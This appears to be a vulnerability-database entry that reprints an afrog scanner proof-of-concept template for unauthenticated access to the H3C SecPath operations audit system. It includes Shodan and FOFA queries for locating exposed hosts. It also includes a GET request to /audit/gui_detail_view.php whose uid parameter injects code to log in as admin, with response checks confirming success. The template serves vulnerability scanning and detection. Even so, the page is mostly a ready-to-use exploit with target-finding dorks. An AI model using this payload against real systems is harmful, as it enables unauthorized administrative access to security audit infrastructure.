h3csecparh-unauthorized-login: H3C Server - Unauthenticated Access

日期: 2025-08-01 | 影响软件: H3C Server | POC: 已公开

漏洞描述

H3C server was able to be accessed with no authentication requirements in place. shodan: http.html:"H3C-SecPath-运维审计系统" fofa: app="H3C-SecPath-运维审计系统" && body="2018"

PoC代码[已公开]

id: h3csecparh-unauthorized-login

info:
  name: H3C Server - Unauthenticated Access
  author: Print1n(http://print1n.top)
  severity: high
  description: |-
    H3C server was able to be accessed with no authentication requirements in place.
    shodan: http.html:"H3C-SecPath-运维审计系统"
    fofa: app="H3C-SecPath-运维审计系统" && body="2018"
  tags: h3c,default-login,unauth
  created: 2023/06/17

rules:
  r0:
    request:
      method: GET
      path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'错误的id') &&
      response.body.bcontains(b'审计管理员') &&
      response.body.bcontains(b'admin')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/h3csecparh-unauthorized-login.yaml

相关漏洞推荐